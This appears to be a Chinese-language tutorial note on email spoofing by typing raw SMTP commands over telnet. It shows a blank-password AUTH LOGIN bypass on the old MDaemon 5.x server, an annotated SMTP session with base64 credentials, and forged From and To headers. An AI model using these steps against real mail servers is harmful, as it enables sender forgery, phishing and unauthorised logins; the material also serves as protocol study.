Mail欺騙發信樣本

漏洞比較早期，如今內部網絡基本沒法作這樣的測試了。

以MDaemon 5.x 郵件服務做爲靶服務器。

 

 

直接上命令

 

telnet ip 25 端口

其餘郵件服務器能夠直接這樣編寫 ，可是這個服務器不能夠。

 

同時，md5.x 這個服務存在驗證漏洞

mdaemon 5.X 存在驗證漏洞
base64 編碼
密碼能夠爲空

220 xxx.com ESMTP MDaemon 5.0.5; Sat, 02 Aug 2003 00:51:06 +0200
EHLO localhost
250-xxx.com Hello localhost, pleased to meet you
250-ETRN
250-AUTH LOGIN CRAM-MD5
250-8BITMIME
250 SIZE 0
AUTH LOGIN
334 VXNlcm5hbWU6 (334 Username:)  //username 的編碼
TURhZW1vbg== (MDaemon) //
334 UGFzc3dvcmQ6 (334 Password:)//
(blank password)

235 Authentication successful

 

#測試複製官方文本

telnet 192.168.0.1 25 ---------------------------------- 使用 telnet 命令鏈接服務器 25 端口

Trying 192.168.0.1... ------------------------------------正在鏈接服務器 25 端口

Connected to 192.168.0.1. -----------------------------鏈接服務器 25 端口成功

220 localhost ESMTP Postfix - by ExtMail ------------顯示服務器標識 ( 修改main.cf 的smtpd_banner)

helo test.com --------------------------------------------向服務器標識用戶身份，發信不要認證，跳過下面幾步直接發送 mail from 命令

250 localhost

ehlo test.com --------------------------------------------ESMTP 命令,發信須要認證。

250-localhost

250-PIPELINING

250-SIZE 102400000

250-VRFY

250-ETRN

250-AUTH LOGIN PLAIN

250-AUTH=LOGIN PLAIN

250-ENHANCEDSTATUSCODES

250-8BITMIME

250 DSN

auth login ------------------------------------------------- 進行用戶身份認證

334 VXNlcm5hbWU6

Y29zdGFAYW1heGl0Lm5ldA== ----------------------------------- BASE64 加密後的用戶名

334 UGFzc3dvcmQ6

MTk4MjIxNA== ----------------------------------------------- BASE64 加密後的密碼

235 authentication successfully ---------------------------- 身份認證成功

(535 authentication failed --------------------------------- 身份認證失敗)

mail from: <test1@domain.com> ------------------------------ mail from 地址 test1@domain.com

250 ok ----------------------------------------------------- 命令執行成功

rcpt to: <test2@domain.com> -------------------------------- 遞送給地址 test2@domain.com

250 ok ----------------------------------------------------- 命令執行成功

data ------------------------------------------------------- 數據傳輸初始化

354 End data with .----------------------------------------- 開始傳輸數據

發到本系統中域名下的帳戶可跳過身份認證。

#測試複製官方文本

 

我的測試不須要使用身份驗證

 

正確的發信格式

From: test1@domain.com

To: test2@domain.com

Date: Mon, 25 Oct 2004 14:24:27 +0800

Subject: test mail

Hi, test2

This is a test mail, you don't reply it.

要點，必定要寫全，並且這些須要手寫模範正規郵件格式

 

------------------------------------------------------------ 數據內容,包括BASE64加密後的郵件內容, 以 CRLF.CRLF 結束數據傳輸

250 OK: queued as 2F6DE3929--------------------------------- 命令執行成功

quit ------------------------------------------------------- 結束會話

221 Bye

Connection closed by foreign host .------------------------- 斷開鏈接

 

PS:

其餘郵件cmd命令

mail from:<address>//郵件發送方 rcpt to:<目的地址>//郵件接收地址 data//告訴服務器一下就是郵件內容部分 from:<目的地址> subject:主題 data:正文內容 .結束 一下是查看pop3服務器下面本身郵箱的郵件 telnet address 110 user //用戶名 pass//密碼 stat//查看郵箱狀態 list list <number> retr<number>//查看具體一封郵件（包括郵件路由信息）